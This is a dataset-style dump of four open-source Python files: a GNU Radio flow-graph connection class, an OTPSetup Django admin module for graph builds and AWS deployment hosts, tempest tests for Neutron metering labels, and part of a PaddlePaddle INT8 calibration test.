repo_name stringlengths 5 100 | path stringlengths 4 375 | copies stringclasses 991 values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15 values |
|---|---|---|---|---|---|
MingdaZhou/gnuradio | grc/base/Connection.py | 17 | 5254 | """
Copyright 2008-2011 Free Software Foundation, Inc.
This file is part of GNU Radio
GNU Radio Companion is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
GNU Radio Companion is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA
"""
from Element import Element
from . import odict
class Connection(Element):
    """A directed connection between a source port and a sink port in a flow graph."""

    def __init__(self, flow_graph, porta, portb):
        """
        Make a new connection given the parent and 2 ports.

        Args:
            flow_graph: the parent of this element
            porta: a port (any direction)
            portb: a port (any direction)
        @throws Error cannot make connection

        Returns:
            a new connection
        """
        Element.__init__(self, flow_graph)
        source = sink = None
        #separate the source and sink
        for port in (porta, portb):
            if port.is_source(): source = port
            if port.is_sink(): sink = port
        if not source: raise ValueError('Connection could not isolate source')
        if not sink: raise ValueError('Connection could not isolate sink')
        # bus ports may only pair with other bus ports, so the number of bus
        # endpoints must be even (0 or 2); a list comprehension (rather than
        # len(filter(...))) keeps this correct on Python 3 as well
        bus_count = len([port for port in (source, sink) if port.get_type() == 'bus'])
        if bus_count % 2 != 0: raise ValueError('busses must get with busses')
        if len(source.get_associated_ports()) != len(sink.get_associated_ports()):
            raise ValueError('port connections must have same cardinality')
        #ensure that this connection (source -> sink) is unique
        for connection in self.get_parent().get_connections():
            if connection.get_source() is source and connection.get_sink() is sink:
                raise LookupError('This connection between source and sink is not unique.')
        self._source = source
        self._sink = sink
        # a bus connection fans out into one connection per associated port
        # pair; individual failures are deliberately ignored (best effort)
        if source.get_type() == 'bus':
            sources = source.get_associated_ports()
            sinks = sink.get_associated_ports()
            for i in range(len(sources)):
                try:
                    flow_graph.connect(sources[i], sinks[i])
                except Exception:
                    pass

    def __str__(self):
        """Return a multi-line description naming both blocks and both ports."""
        return 'Connection (\n\t%s\n\t\t%s\n\t%s\n\t\t%s\n)'%(
            self.get_source().get_parent(),
            self.get_source(),
            self.get_sink().get_parent(),
            self.get_sink(),
        )

    def is_connection(self): return True

    def validate(self):
        """
        Validate the connections.
        The ports must match in type.
        """
        Element.validate(self)
        platform = self.get_parent().get_parent()
        source_domain = self.get_source().get_domain()
        sink_domain = self.get_sink().get_domain()
        # the platform must know how to bridge the two port domains
        if (source_domain, sink_domain) not in platform.get_connection_templates():
            self.add_error_message('No connection known for domains "%s", "%s"'
                                   % (source_domain, sink_domain))
        # some domains restrict fan-out / fan-in to a single connection
        too_many_other_sinks = (
            source_domain in platform.get_domains() and
            not platform.get_domain(key=source_domain)['multiple_sinks'] and
            len(self.get_source().get_enabled_connections()) > 1
        )
        too_many_other_sources = (
            sink_domain in platform.get_domains() and
            not platform.get_domain(key=sink_domain)['multiple_sources'] and
            len(self.get_sink().get_enabled_connections()) > 1
        )
        if too_many_other_sinks:
            self.add_error_message(
                'Domain "%s" can have only one downstream block' % source_domain)
        if too_many_other_sources:
            self.add_error_message(
                'Domain "%s" can have only one upstream block' % sink_domain)

    def get_enabled(self):
        """
        Get the enabled state of this connection.

        Returns:
            true if source and sink blocks are enabled
        """
        return self.get_source().get_parent().get_enabled() and \
            self.get_sink().get_parent().get_enabled()

    #############################
    # Access Ports
    #############################
    def get_sink(self): return self._sink
    def get_source(self): return self._source

    ##############################################
    ## Import/Export Methods
    ##############################################
    def export_data(self):
        """
        Export this connection's info.

        Returns:
            a nested data odict
        """
        n = odict()
        n['source_block_id'] = self.get_source().get_parent().get_id()
        n['sink_block_id'] = self.get_sink().get_parent().get_id()
        n['source_key'] = self.get_source().get_key()
        n['sink_key'] = self.get_sink().get_key()
        return n
| gpl-3.0 |
Genovo/OTPSetup | otpsetup/client/admin.py | 2 | 12559 | from boto import connect_s3, connect_ec2
from boto.s3.key import Key
from datetime import datetime
from django.conf import settings
from django.contrib import admin
from django.db import models
from django.forms import TextInput, Textarea
from kombu import Exchange
from models import InstanceRequest, AmazonMachineImage, GtfsFile, ManagedDeployment, DeploymentGroup, GraphBuild, GtfsBuildMapping, BuildHostMapping
from otpsetup.deploy_ops import deploy_once
import urllib2, sys, time
from otpsetup.client.lib.buttonable_model_admin import ButtonableModelAdmin
from otpsetup.client.models import InstanceRequest, GtfsFile, DeploymentHost
from otpsetup.shortcuts import render_to_response
from otpsetup.shortcuts import DjangoBrokerConnection
from otpsetup.shortcuts import check_for_running_instance
def accept_instance_request(modeladmin, request, queryset):
    """Admin action: queue each selected request for graph building, then mark it accepted."""
    exchange = Exchange("amq.direct", type="direct", durable=True)
    conn = DjangoBrokerConnection()
    producer = conn.Producer(routing_key="create_instance",
                             exchange=exchange)
    for irequest in queryset:
        # an already-approved request is not re-published
        if irequest.state == 'approved':
            continue
        producer.publish({
            "files": [gtfsfile.s3_key for gtfsfile in irequest.gtfsfile_set.all()],
            "extra_properties": [gtfsfile.extra_properties for gtfsfile in irequest.gtfsfile_set.all()],
            "request_id": irequest.id,
            "fare_factory": irequest.fare_factory,
        })
    # a real queryset supports bulk update(); a plain list is saved row by row
    if hasattr(queryset, 'update'):
        queryset.update(state='accepted', decision_date=datetime.now())
    else:
        for irequest in queryset:
            irequest.state = "accepted"
            irequest.decision_date = datetime.now()
            irequest.save()
    #launch a graph builder EC2 instance
    check_for_running_instance(settings.GRAPH_BUILDER_AMI_ID)
accept_instance_request.short_description = "Send an instance request to the graph builder"
def reject_instance_request(modeladmin, request, queryset):
    """Admin action: delete each request's uploaded GTFS files from S3 and mark it rejected."""
    s3 = connect_s3(settings.AWS_ACCESS_KEY_ID, settings.AWS_SECRET_KEY)
    bucket = s3.get_bucket(settings.S3_BUCKET)
    for irequest in queryset:
        # already-rejected requests have no files left to remove
        if irequest.state == 'rejected':
            continue
        for gtfs in irequest.gtfsfile_set.all():
            key = Key(bucket)
            key.key = gtfs.s3_key
            key.delete()
    # a real queryset supports bulk update(); a plain list is saved row by row
    if hasattr(queryset, 'update'):
        queryset.update(state='rejected', decision_date=datetime.now())
    else:
        for irequest in queryset:
            irequest.state = "rejected"
            irequest.decision_date = datetime.now()
            irequest.save()
reject_instance_request.short_description = "Reject an instance request"
def rebuild_instance_request(modeladmin, request, queryset):
    """Admin action: re-queue graph builds from archived data, then mark the requests accepted."""
    exchange = Exchange("amq.direct", type="direct", durable=True)
    conn = DjangoBrokerConnection()
    producer = conn.Producer(routing_key="rebuild_graph",
                             exchange=exchange)
    for irequest in queryset:
        producer.publish({"request_id": irequest.id, "data_key": irequest.data_key})
    # a real queryset supports bulk update(); a plain list is saved row by row
    if hasattr(queryset, 'update'):
        queryset.update(state='accepted', decision_date=datetime.now())
    else:
        for irequest in queryset:
            irequest.state = "accepted"
            irequest.decision_date = datetime.now()
            irequest.save()
    #launch a graph builder EC2 instance
    check_for_running_instance(settings.GRAPH_BUILDER_AMI_ID)
rebuild_instance_request.short_description = "Rebuild graph using archived configuration data"
class GtfsFileInline(admin.StackedInline):
    """Inline editor for the GTFS files attached to an InstanceRequest."""
    model = GtfsFile
    fields = ('s3_key', 'transload_url', 'validation_output_str', 'extra_properties')
    # validation results are produced by the pipeline, never edited by hand
    readonly_fields = ('transload_url', 'validation_output', 'validation_output_str')
    # widen the default widgets so long S3 keys / JSON blobs are readable
    formfield_overrides = {
        models.CharField: {'widget': TextInput(attrs={'size':118})},
        models.TextField: {'widget': Textarea(attrs={'rows':4, 'cols':84})},
    }
class InstanceRequestAdmin(ButtonableModelAdmin):
    """Admin for InstanceRequest with approve/reject buttons and an email-text helper."""
    list_display = ('id', 'user', 'agency', 'submit_date', 'state', 'otp_version', 'deployment_host', 'email_link')
    list_filter = ('state', 'submit_date')
    actions = [accept_instance_request, reject_instance_request, rebuild_instance_request]
    readonly_fields = ('user', 'state', 'submit_date', 'decision_date', 'ip', 'otp_version', 'graph_url', 'public_url', 'admin_password')
    fields = ('submit_date', 'user', 'agency', 'comments', 'fare_factory', 'state', 'data_key', 'graph_key', 'public_url', 'graph_url', 'admin_password', 'otp_version', 'deployment_host')
    inlines = [
        GtfsFileInline,
    ]

    def email_link(self, obj):
        """Render an "Email Text" link that opens a popup containing a canned
        notification email for the requester (deployment URL, graph download
        URL, API credentials). Returns raw HTML/JS for the changelist column."""
        # without both a built graph and a public URL there is nothing to email
        if(obj.graph_key == None or obj.public_url == None):
            return "N/A"
        graph_url = "https://s3.amazonaws.com/%s" % urllib2.quote(obj.graph_key)
        # build a per-row JS function (suffixed with the request id so multiple
        # rows on one page do not collide) that writes the email into a popup
        html = "<script type=\"text/javascript\">"
        html += "function open_email_window_%s() {" % obj.id
        html += "  myWindow=window.open('','','width=800,height=300');"
        html += "  myWindow.document.write('<div style=\"font-family:sans-serif; font-size:13px;\">');"
        html += "  myWindow.document.write('To: %s<br>');" % obj.user.email
        html += "  myWindow.document.write('Subject: Your OTP Deployer Request for %s<br><br>');" % obj.agency
        html += "  myWindow.document.write('This email is regarding the OTP Deployer request you submitted for \"%s\" on %s. ');" % (obj.agency, obj.submit_date.strftime("%B %d"))
        html += "  myWindow.document.write('The OTP instance has been deployed at:<br>%s<br><br>');" % obj.public_url
        html += "  myWindow.document.write('This instance will remain online for the following week. Please contact us if you would like to discuss longer-term hosting options.<br><br>');"
        html += "  myWindow.document.write('Additionally, the graph file can be downloaded directly at:<br>%s<br>');" % graph_url
        html += "  myWindow.document.write('The graph file was built with OTP version %s.<br><br>');" % obj.otp_version
        html += "  myWindow.document.write('If you need API access, visit http://deployer.opentripplanner.org/api_access for instructions. Your request ID is: <b>req-%s</b><br>');" % obj.id
        html += "  myWindow.document.write('The username / password for authenticated API calls is: admin / %s<br><br>');" % obj.admin_password
        html += "  myWindow.document.write('Thank you for your interest in OTP and please let me know if you have any questions.');"
        html += "  myWindow.document.write('</div>');"
        html += "  myWindow.focus();"
        html += "}"
        html += "</script>"
        html += "<a href='javascript:open_email_window_%s()'>Email Text</a>" % obj.id
        return html
    email_link.short_description = "email link"
    # allow_tags tells the (old-style) admin to render the HTML unescaped
    email_link.allow_tags = True

    formfield_overrides = {
        models.CharField: {'widget': TextInput(attrs={'size':118})}
    }

    def approve_or_reject_buttons(self, request=None, object_id=None):
        """Choose which ButtonableModelAdmin buttons to show for the current state."""
        if request is None:
            return [self.approve, self.reject]
        irequest = InstanceRequest.objects.get(id=object_id)
        if irequest.state == "submitted":
            return [self.approve, self.reject]
        if irequest.state == "rejected":
            #you can actually approve a rejected request, and it will go through (I hope)
            return [self.approve]
        elif irequest.state != "running":
            #you can preemptively reject something, too
            return [self.reject]
    buttons = approve_or_reject_buttons

    def approve(self, irequest):
        """Button handler: run the accept action on this single request."""
        accept_instance_request(None, None, [irequest])
    approve.short_description = "Approve"

    def reject(self, irequest):
        """Button handler: run the reject action on this single request."""
        reject_instance_request(None, None, [irequest])
    reject.short_description = "Reject"
admin.site.register(InstanceRequest, InstanceRequestAdmin)
class AmazonMachineImageAdmin(admin.ModelAdmin):
    """Admin listing of registered AMIs and which one new instances use by default."""
    list_display = ('machine_type', 'version', 'ami_id', 'default_for_new_instances')
admin.site.register(AmazonMachineImage, AmazonMachineImageAdmin)
class BuildHostMappingInline(admin.TabularInline):
    """Read-only inline showing which graph builds run on which deployment hosts."""
    model=BuildHostMapping
    readonly_fields = ('graph_build','deployment_host')
    # no blank extra rows: mappings are created by the deploy pipeline
    extra=0
def launch_deployment_host(modeladmin, request, queryset):
    """Admin action: publish a launch message and start an EC2 multideployer for each host."""
    exchange = Exchange("amq.direct", type="direct", durable=True)
    conn = DjangoBrokerConnection()
    producer = conn.Producer(routing_key="launch_multideployer", exchange=exchange)
    ec2_conn = connect_ec2(settings.AWS_ACCESS_KEY_ID, settings.AWS_SECRET_KEY)
    for dephost in queryset:
        # publish launch_multideployer message
        producer.publish({"request_id": dephost.id})
        dephost.instance_id = "launching..."
        # give unnamed hosts a default name derived from their id
        if not dephost.name:
            dephost.name = 'dephost_%s' % dephost.id
        dephost.save()
        # create new instance to receive message
        image = ec2_conn.get_image(settings.MULTIDEPLOYER_AMI_ID)
        reservation = image.run(subnet_id=settings.VPC_SUBNET_ID, placement='us-east-1b', key_name='otp-dev', instance_type='m2.xlarge')
        # brief pause so the instance exists before tagging it
        time.sleep(5)
        for instance in reservation.instances:
            instance.add_tag("Name", dephost.name)
launch_deployment_host.short_description = "Launch deployment host instance on AWS"
def update_memory(modeladmin, request, queryset):
    """Admin action: poll each deployment host's memcheck endpoint and store its
    total/free memory. Unreachable hosts are skipped with a stderr warning."""
    for dephost in queryset:
        try:
            response = urllib2.urlopen('http://%s:8080/memcheck/total' % dephost.host_ip)
            dephost.total_memory = int(response.read().strip())
            response = urllib2.urlopen('http://%s:8080/memcheck/free' % dephost.host_ip)
            dephost.free_memory = int(response.read().strip())
            dephost.save()
        except Exception:
            # best effort: keep going for the remaining hosts.
            # fix: the original format string used '%' instead of '%s', which
            # mangled the message and dropped the host id
            sys.stderr.write("warning: memory utilization for deployment host %s could not be accessed\n" % dephost.id)
class DeploymentHostAdmin(admin.ModelAdmin):
    """Admin for deployment hosts: launch instances, refresh memory stats, view builds."""
    list_display = ('id', 'group', 'name', 'instance_id', 'host_ip', 'otp_version', 'total_memory', 'free_memory')
    # these fields are populated by AWS / the memcheck poller, not by hand
    readonly_fields = ('instance_id', 'host_ip', 'auth_password', 'total_memory', 'free_memory')
    actions = [launch_deployment_host, update_memory]
    inlines = [
        BuildHostMappingInline
    ]
admin.site.register(DeploymentHost, DeploymentHostAdmin)
class DeploymentGroupAdmin(admin.ModelAdmin):
    """Minimal admin listing for deployment groups."""
    list_display = ('id', 'name')
admin.site.register(DeploymentGroup, DeploymentGroupAdmin)
class GtfsBuildMappingInline(admin.TabularInline):
    """Read-only inline showing which GTFS feeds went into which graph builds."""
    model=GtfsBuildMapping
    readonly_fields = ( 'gtfs_feed', 'graph_build')
    # no blank extra rows: mappings are created by the build pipeline
    extra=0
# GraphBuild
def update_graph_size(modeladmin, request, queryset):
    """Admin action: refresh GraphBuild.graph_size from the size of its S3 object.

    Only successful builds that actually have a graph key are touched.
    """
    # hoisted: open one S3 connection/bucket for the whole queryset instead of
    # reconnecting once per build inside the loop
    connection = connect_s3(settings.AWS_ACCESS_KEY_ID, settings.AWS_SECRET_KEY)
    bucket = connection.get_bucket(settings.GRAPH_S3_BUCKET)
    for build in queryset:
        if build.success and build.graph_key is not None:
            key = bucket.lookup(build.graph_key)
            build.graph_size = int(key.size)
            build.save()
def deploy_managed_graph(modeladmin, request, queryset):
    """Admin action: deploy every successful build that has a stored graph."""
    for build in queryset:
        if build.success and build.graph_key is not None:
            deploy_once(build)
class GraphBuildAdmin(ButtonableModelAdmin):
    """Admin for graph builds with size-refresh / deploy actions and a redeploy button."""
    list_display = ('id', 'deployment', 'success', 'gtfs_count', 'creation_date', 'completion_date', 'graph_size', 'otp_version', 'host_count')
    # build metadata is written by the pipeline, never edited by hand
    readonly_fields = ('deployment', 'success', 'creation_date', 'completion_date', 'otp_version')
    inlines = [
        GtfsBuildMappingInline, BuildHostMappingInline
    ]
    actions = [update_graph_size, deploy_managed_graph]

    def redeploy(self, request):
        """Button handler stub: only reports "redeployed" to the user."""
        self.message_user(request, "redeployed")
    redeploy.short_description = "Redeploy"
    buttons = [redeploy]
admin.site.register(GraphBuild, GraphBuildAdmin)
class GraphBuildInline(admin.TabularInline):
    """Read-only inline summarizing a deployment's graph builds (keys/config hidden)."""
    readonly_fields =('link', 'success', 'gtfs_count', 'creation_date','completion_date','graph_size', 'otp_version', 'host_count')
    exclude = ('osm_key','graph_key', 'output_key', 'config')
    model = GraphBuild
    extra = 0
# ManagedDeployment
class ManagedDeploymentAdmin(admin.ModelAdmin):
    """Admin for managed deployments, grouped and showing their build history inline."""
    list_display = ('id', 'group', 'source', 'description')
    list_filter = ('group',)
    inlines = [
        GraphBuildInline,
    ]
admin.site.register(ManagedDeployment, ManagedDeploymentAdmin)
| gpl-3.0 |
hayderimran7/tempest | tempest/api/network/test_metering_extensions.py | 17 | 6784 | # Copyright (C) 2014 eNovance SAS <licensing@enovance.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from tempest.api.network import base
from tempest.common.utils import data_utils
from tempest import test
LOG = logging.getLogger(__name__)
class MeteringTestJSON(base.BaseAdminNetworkTest):
    """
    Tests the following operations in the Neutron API using the REST client for
    Neutron:

        List, Show, Create, Delete Metering labels
        List, Show, Create, Delete Metering labels rules
    """

    @classmethod
    def skip_checks(cls):
        # skip the whole class when the metering extension is not deployed
        super(MeteringTestJSON, cls).skip_checks()
        if not test.is_extension_enabled('metering', 'network'):
            msg = "metering extension not enabled."
            raise cls.skipException(msg)

    @classmethod
    def resource_setup(cls):
        # shared fixtures: one metering label plus one ingress rule on it,
        # reused by the show/list tests below
        super(MeteringTestJSON, cls).resource_setup()
        description = "metering label created by tempest"
        name = data_utils.rand_name("metering-label")
        cls.metering_label = cls.create_metering_label(name, description)
        # prefix depends on the address family exercised by the subclass
        remote_ip_prefix = ("10.0.0.0/24" if cls._ip_version == 4
                            else "fd02::/64")
        direction = "ingress"
        cls.metering_label_rule = cls.create_metering_label_rule(
            remote_ip_prefix, direction,
            metering_label_id=cls.metering_label['id'])

    def _delete_metering_label(self, metering_label_id):
        # Deletes a label and verifies if it is deleted or not
        self.admin_client.delete_metering_label(metering_label_id)
        # Asserting that the label is not found in list after deletion
        labels = self.admin_client.list_metering_labels(id=metering_label_id)
        self.assertEqual(len(labels['metering_labels']), 0)

    def _delete_metering_label_rule(self, metering_label_rule_id):
        # Deletes a rule and verifies if it is deleted or not
        self.admin_client.delete_metering_label_rule(
            metering_label_rule_id)
        # Asserting that the rule is not found in list after deletion
        rules = (self.admin_client.list_metering_label_rules(
            id=metering_label_rule_id))
        self.assertEqual(len(rules['metering_label_rules']), 0)

    @test.idempotent_id('e2fb2f8c-45bf-429a-9f17-171c70444612')
    def test_list_metering_labels(self):
        # Verify label filtering
        # id=33 is an arbitrary id that should match nothing
        body = self.admin_client.list_metering_labels(id=33)
        metering_labels = body['metering_labels']
        self.assertEqual(0, len(metering_labels))

    @test.idempotent_id('ec8e15ff-95d0-433b-b8a6-b466bddb1e50')
    def test_create_delete_metering_label_with_filters(self):
        # Creates a label
        name = data_utils.rand_name('metering-label-')
        description = "label created by tempest"
        body = self.admin_client.create_metering_label(name=name,
                                                       description=description)
        metering_label = body['metering_label']
        # cleanup also asserts the label disappears from the listing
        self.addCleanup(self._delete_metering_label,
                        metering_label['id'])
        # Assert whether created labels are found in labels list or fail
        # if created labels are not found in labels list
        labels = (self.admin_client.list_metering_labels(
            id=metering_label['id']))
        self.assertEqual(len(labels['metering_labels']), 1)

    @test.idempotent_id('30abb445-0eea-472e-bd02-8649f54a5968')
    def test_show_metering_label(self):
        # Verifies the details of a label
        body = self.admin_client.show_metering_label(self.metering_label['id'])
        metering_label = body['metering_label']
        self.assertEqual(self.metering_label['id'], metering_label['id'])
        self.assertEqual(self.metering_label['tenant_id'],
                         metering_label['tenant_id'])
        self.assertEqual(self.metering_label['name'], metering_label['name'])
        self.assertEqual(self.metering_label['description'],
                         metering_label['description'])

    @test.idempotent_id('cc832399-6681-493b-9d79-0202831a1281')
    def test_list_metering_label_rules(self):
        # Verify rule filtering
        # id=33 is an arbitrary id that should match nothing
        body = self.admin_client.list_metering_label_rules(id=33)
        metering_label_rules = body['metering_label_rules']
        self.assertEqual(0, len(metering_label_rules))

    @test.idempotent_id('f4d547cd-3aee-408f-bf36-454f8825e045')
    def test_create_delete_metering_label_rule_with_filters(self):
        # Creates a rule
        # a different prefix than the fixture rule to avoid a duplicate
        remote_ip_prefix = ("10.0.1.0/24" if self._ip_version == 4
                            else "fd03::/64")
        body = (self.admin_client.create_metering_label_rule(
            remote_ip_prefix=remote_ip_prefix,
            direction="ingress",
            metering_label_id=self.metering_label['id']))
        metering_label_rule = body['metering_label_rule']
        # cleanup also asserts the rule disappears from the listing
        self.addCleanup(self._delete_metering_label_rule,
                        metering_label_rule['id'])
        # Assert whether created rules are found in rules list or fail
        # if created rules are not found in rules list
        rules = (self.admin_client.list_metering_label_rules(
            id=metering_label_rule['id']))
        self.assertEqual(len(rules['metering_label_rules']), 1)

    @test.idempotent_id('b7354489-96ea-41f3-9452-bace120fb4a7')
    def test_show_metering_label_rule(self):
        # Verifies the details of a rule
        body = (self.admin_client.show_metering_label_rule(
            self.metering_label_rule['id']))
        metering_label_rule = body['metering_label_rule']
        self.assertEqual(self.metering_label_rule['id'],
                         metering_label_rule['id'])
        self.assertEqual(self.metering_label_rule['remote_ip_prefix'],
                         metering_label_rule['remote_ip_prefix'])
        self.assertEqual(self.metering_label_rule['direction'],
                         metering_label_rule['direction'])
        self.assertEqual(self.metering_label_rule['metering_label_id'],
                         metering_label_rule['metering_label_id'])
        self.assertFalse(metering_label_rule['excluded'])
class MeteringIpV6TestJSON(MeteringTestJSON):
    """Re-run the metering tests with IPv6 prefixes instead of IPv4."""
    _ip_version = 6
| apache-2.0 |
baidu/Paddle | python/paddle/fluid/contrib/tests/test_calibration.py | 1 | 11778 | # copyright (c) 2018 paddlepaddle authors. all rights reserved.
#
# licensed under the apache license, version 2.0 (the "license");
# you may not use this file except in compliance with the license.
# you may obtain a copy of the license at
#
# http://www.apache.org/licenses/license-2.0
#
# unless required by applicable law or agreed to in writing, software
# distributed under the license is distributed on an "as is" basis,
# without warranties or conditions of any kind, either express or implied.
# see the license for the specific language governing permissions and
# limitations under the license.
import unittest
import os
import numpy as np
import time
import sys
import random
import paddle
import paddle.fluid as fluid
import functools
import contextlib
from paddle.dataset.common import download
from PIL import Image, ImageEnhance
import math
import paddle.fluid.contrib.int8_inference.utility as int8_utility
# fixed seeds so calibration accuracy comparisons are reproducible
random.seed(0)
np.random.seed(0)

DATA_DIM = 224          # network input height/width in pixels
THREAD = 1              # worker threads for the xmap reader
BUF_SIZE = 102400       # reader buffer size
DATA_DIR = 'data/ILSVRC2012'

# per-channel ImageNet normalization constants, shaped for CHW broadcasting
img_mean = np.array([0.485, 0.456, 0.406]).reshape((3, 1, 1))
img_std = np.array([0.229, 0.224, 0.225]).reshape((3, 1, 1))
# TODO(guomingz): Remove duplicated code from resize_short, crop_image, process_image, _reader_creator
def resize_short(img, target_size):
    """Scale *img* so its shorter edge equals *target_size*, preserving aspect ratio."""
    scale = float(target_size) / min(img.size[0], img.size[1])
    new_width = int(round(img.size[0] * scale))
    new_height = int(round(img.size[1] * scale))
    return img.resize((new_width, new_height), Image.LANCZOS)
def crop_image(img, target_size, center):
    """Crop a square of side *target_size* from *img*.

    Args:
        img: PIL-style image exposing .size and .crop((l, t, r, b)).
        target_size: side length of the square crop in pixels.
        center: if truthy, crop from the center; otherwise from a uniformly
            random position (uses np.random, so it honors the module seed).

    Returns:
        the cropped image.
    """
    width, height = img.size
    size = target_size
    if center:
        # fix: use floor division so the crop box stays integral on Python 3
        # (plain '/' relied on Python 2 integer division)
        w_start = (width - size) // 2
        h_start = (height - size) // 2
    else:
        w_start = np.random.randint(0, width - size + 1)
        h_start = np.random.randint(0, height - size + 1)
    w_end = w_start + size
    h_end = h_start + size
    return img.crop((w_start, h_start, w_end, h_end))
def process_image(sample, mode, color_jitter, rotate):
    """Load one (path, label) sample and return a normalized CHW float32 array plus its label.

    mode/color_jitter/rotate are accepted for reader-API compatibility but unused here.
    """
    path, label = sample[0], sample[1]
    img = Image.open(path)
    # shorter edge to 256, then a centered DATA_DIM x DATA_DIM crop
    img = crop_image(resize_short(img, target_size=256), target_size=DATA_DIM, center=True)
    if img.mode != 'RGB':
        img = img.convert('RGB')
    # HWC uint8 -> CHW float32 in [0, 1], then ImageNet mean/std normalization
    arr = np.array(img).astype('float32').transpose((2, 0, 1)) / 255
    arr -= img_mean
    arr /= img_std
    return arr, label
def _reader_creator(file_list,
                    mode,
                    shuffle=False,
                    color_jitter=False,
                    rotate=False,
                    data_dir=DATA_DIR):
    """Build a paddle reader yielding processed (image, label) samples from *file_list*.

    Each line of *file_list* is "<relative image path> <integer label>"; entries
    whose image file is missing are silently skipped.
    """
    def reader():
        with open(file_list) as flist:
            entries = [line.strip() for line in flist]
            if shuffle:
                np.random.shuffle(entries)
            for entry in entries:
                img_path, label = entry.split()
                img_path = os.path.join(data_dir, img_path)
                if os.path.exists(img_path):
                    yield img_path, int(label)

    mapper = functools.partial(
        process_image, mode=mode, color_jitter=color_jitter, rotate=rotate)
    # decode/normalize images in THREAD worker(s) with a BUF_SIZE buffer
    return paddle.reader.xmap_readers(mapper, reader, THREAD, BUF_SIZE)
def val(data_dir=DATA_DIR):
    """Return a validation-set reader built from <data_dir>/val_list.txt (no shuffling)."""
    return _reader_creator(
        os.path.join(data_dir, 'val_list.txt'), 'val', shuffle=False, data_dir=data_dir)
class TestCalibrationForResnet50(unittest.TestCase):
    """End-to-end INT8 calibration test: run FP32 inference, calibrate, run INT8
    inference, and assert the accuracy drop stays below 1%.

    Fix applied throughout: statements of the form print('...{0}').format(x)
    only worked because Python 2 parses them as a print *statement* of the
    formatted expression; they raise AttributeError on Python 3. They are
    rewritten as print('...{0}'.format(x)), which prints identically on both.
    """

    def setUp(self):
        """Download the (full or small) ImageNet validation data and configure
        batch size / iteration counts based on the DATASET environment variable."""
        self.int8_download = 'int8/download'
        self.cache_folder = os.path.expanduser('~/.cache/paddle/dataset/' +
                                               self.int8_download)
        data_urls = []
        data_md5s = []
        self.data_cache_folder = ''
        if os.environ.get('DATASET') == 'full':
            # full ImageNet val set ships as two concatenatable tar parts
            data_urls.append(
                'https://paddle-inference-dist.bj.bcebos.com/int8/ILSVRC2012_img_val.tar.gz.partaa'
            )
            data_md5s.append('60f6525b0e1d127f345641d75d41f0a8')
            data_urls.append(
                'https://paddle-inference-dist.bj.bcebos.com/int8/ILSVRC2012_img_val.tar.gz.partab'
            )
            data_md5s.append('1e9f15f64e015e58d6f9ec3210ed18b5')
            self.data_cache_folder = self.download_data(data_urls, data_md5s,
                                                        "full_data", False)
        else:
            data_urls.append(
                'http://paddle-inference-dist.bj.bcebos.com/int8/calibration_test_data.tar.gz'
            )
            data_md5s.append('1b6c1c434172cca1bf9ba1e4d7a3157d')
            self.data_cache_folder = self.download_data(data_urls, data_md5s,
                                                        "small_data", False)

        # reader/decorator.py requires the relative path to the data folder
        cmd = 'rm -rf {0} && ln -s {1} {0}'.format("data",
                                                   self.data_cache_folder)
        os.system(cmd)

        self.batch_size = 1
        self.sample_iterations = 50
        self.infer_iterations = 50000 if os.environ.get(
            'DATASET') == 'full' else 50

    def cache_unzipping(self, target_folder, zip_path):
        """Extract *zip_path* into *target_folder* unless it already exists."""
        if not os.path.exists(target_folder):
            cmd = 'mkdir {0} && tar xf {1} -C {0}'.format(target_folder,
                                                          zip_path)
            os.system(cmd)

    def download_data(self, data_urls, data_md5s, folder_name, is_model=True):
        """Download (and for the full dataset, concatenate) archives, unpack
        them under the cache folder, and return the unpacked directory."""
        data_cache_folder = os.path.join(self.cache_folder, folder_name)
        zip_path = ''
        if os.environ.get('DATASET') == 'full':
            file_names = []
            for i in range(0, len(data_urls)):
                download(data_urls[i], self.int8_download, data_md5s[i])
                file_names.append(data_urls[i].split('/')[-1])
            # the two downloaded parts are cat-ed back into one tarball
            zip_path = os.path.join(self.cache_folder,
                                    'full_imagenet_val.tar.gz')
            if not os.path.exists(zip_path):
                cat_command = 'cat'
                for file_name in file_names:
                    cat_command += ' ' + os.path.join(self.cache_folder,
                                                      file_name)
                cat_command += ' > ' + zip_path
                os.system(cat_command)

        if os.environ.get('DATASET') != 'full' or is_model:
            download(data_urls[0], self.int8_download, data_md5s[0])
            file_name = data_urls[0].split('/')[-1]
            zip_path = os.path.join(self.cache_folder, file_name)

        # fix: print the formatted string (was a Py2-only print statement form)
        print('Data is downloaded at {0}'.format(zip_path))
        self.cache_unzipping(data_cache_folder, zip_path)
        return data_cache_folder

    def download_model(self):
        """Fetch the FP32 ResNet-50 model and select the calibration algorithm."""
        # resnet50 fp32 data
        data_urls = [
            'http://paddle-inference-dist.bj.bcebos.com/int8/resnet50_int8_model.tar.gz'
        ]
        data_md5s = ['4a5194524823d9b76da6e738e1367881']
        self.model_cache_folder = self.download_data(data_urls, data_md5s,
                                                     "resnet50_fp32")
        self.model = "ResNet-50"
        self.algo = "direct"

    def run_program(self, model_path, generate_int8=False, algo='direct'):
        """Run inference over the validation reader.

        With generate_int8=True, sample activations for *algo* calibration and
        write the INT8 model to ./calibration_out (returns None). Otherwise
        return (throughput images/s, mean latency s, top-1 accuracy).
        """
        image_shape = [3, 224, 224]
        fluid.memory_optimize(fluid.default_main_program())

        exe = fluid.Executor(fluid.CPUPlace())

        [infer_program, feed_dict,
         fetch_targets] = fluid.io.load_inference_model(model_path, exe)

        t = fluid.transpiler.InferenceTranspiler()
        t.transpile(infer_program, fluid.CPUPlace())

        val_reader = paddle.batch(val(), self.batch_size)
        iterations = self.infer_iterations

        if generate_int8:
            int8_model = os.path.join(os.getcwd(), "calibration_out")
            iterations = self.sample_iterations

